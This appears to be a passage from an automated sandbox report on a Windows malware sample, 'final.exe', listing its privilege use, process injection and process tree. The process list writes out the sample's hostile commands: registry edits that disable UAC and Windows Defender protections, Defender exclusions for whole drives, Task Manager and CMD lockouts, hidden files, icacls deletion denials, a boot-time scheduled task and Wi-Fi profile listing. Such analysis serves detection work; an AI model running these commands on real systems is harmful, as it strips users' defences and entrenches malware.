N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\$Sys-Manager\systemservice92.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2384 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Users\Admin\AppData\Local\Temp\final.exe
PID 2384 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Users\Admin\AppData\Local\Temp\final.exe
PID 1600 wrote to memory of 3916 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 3916 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1600 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2512 wrote to memory of 2148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2512 wrote to memory of 2148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3916 wrote to memory of 4660 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3916 wrote to memory of 4660 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 224 wrote to memory of 4940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 224 wrote to memory of 4940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1060 wrote to memory of 3884 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1060 wrote to memory of 3884 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1600 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 3452 wrote to memory of 4456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3452 wrote to memory of 4456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 592 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 592 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 592 wrote to memory of 2900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 592 wrote to memory of 2900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 1600 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 2260 wrote to memory of 4860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2260 wrote to memory of 4860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1600 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4876 wrote to memory of 4848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4876 wrote to memory of 4848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2848 wrote to memory of 3704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2848 wrote to memory of 3704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1600 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 3992 N/A C:\Windows\system32\cmd.exe C:\$Sys-Manager\systemservice92.exe
PID 592 wrote to memory of 3992 N/A C:\Windows\system32\cmd.exe C:\$Sys-Manager\systemservice92.exe
PID 592 wrote to memory of 3056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 592 wrote to memory of 3056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2060 wrote to memory of 1588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2060 wrote to memory of 1588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1600 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 2104 wrote to memory of 3952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2104 wrote to memory of 3952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1600 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4588 wrote to memory of 3724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4588 wrote to memory of 3724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 592 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 592 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 592 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 592 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 592 wrote to memory of 2236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 592 wrote to memory of 2236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStore = "1" C:\$Sys-Manager\systemservice92.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\final.exe

C:\Users\Admin\AppData\Local\Temp\final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"

C:\Users\Admin\AppData\Local\Temp\final.exe

C:\Users\Admin\AppData\Local\Temp\final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\$Sys-Manager\systemservice.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager\systemservice92.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager\systemservice.bat""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager""

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /tn servicebat /tr C:\$Sys-Manager\systemservice.bat /sc onstart /f

C:\Windows\system32\reg.exe

reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f

C:\Windows\system32\attrib.exe

attrib +h "C:\$Sys-Manager\systemservice92.exe"

C:\Windows\system32\attrib.exe

attrib +h "C:\$Sys-Manager"

C:\Windows\system32\attrib.exe

attrib +h "C:\$Sys-Manager\systemservice.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\$Sys-Manager" /deny *S-1-1-0:(D)"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f"

C:\Windows\system32\reg.exe

reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"

C:\Windows\system32\icacls.exe

icacls "C:\$Sys-Manager" /deny *S-1-1-0:(D)

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f

C:\$Sys-Manager\systemservice92.exe

"C:\$Sys-Manager\systemservice92.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\$Sys-Manager" /deny *S-1-5-32-544:(D)"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\icacls.exe

icacls "C:\$Sys-Manager" /deny *S-1-5-32-544:(D)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\$Sys-Manager" /deny *S-1-5-32-545:(D)"

C:\Windows\system32\icacls.exe

icacls "C:\$Sys-Manager" /deny *S-1-5-32-545:(D)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager\desktop.ini""

C:\Windows\system32\attrib.exe

attrib +h "C:\$Sys-Manager\desktop.ini"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\$Sys-Manager\systemservice92.exe

"C:\$Sys-Manager\systemservice92.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f"

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath 'C:\'"

C:\Windows\SYSTEM32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath 'D:\'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath '.exe'"

C:\Windows\SYSTEM32\netsh.exe

netsh wlan show profiles

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath '.bat'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath '.vbs'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath '.py'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath '.pyw'"

C:\Windows\System32\Wbem\wmic.exe

wmic product get name

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f

C:\Windows\system32\reg.exe

reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v SubmitSamplesConsent /f

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableCloudProtection /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f"

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableCloudProtection /t REG_DWORD /d 1 /f

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Behavior Monitoring" /v DisableBehaviorMonitoring /f

C:\Windows\system32\reg.exe

reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Behavior Monitoring" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableNetworkProtection /f

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableNetworkProtection /t REG_DWORD /d 1 /f

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirusSignatures /f

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirusSignatures /t REG_DWORD /d 1 /f

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAccess /f

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAccess /t REG_DWORD /d 1 /f

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableSecurityCenter /f

C:\Windows\SYSTEM32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableSecurityCenter /t REG_DWORD /d 1 /f

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /f /im firefox.exe"

C:\Windows\system32\taskkill.exe

taskkill /f /im firefox.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\cmd.exe
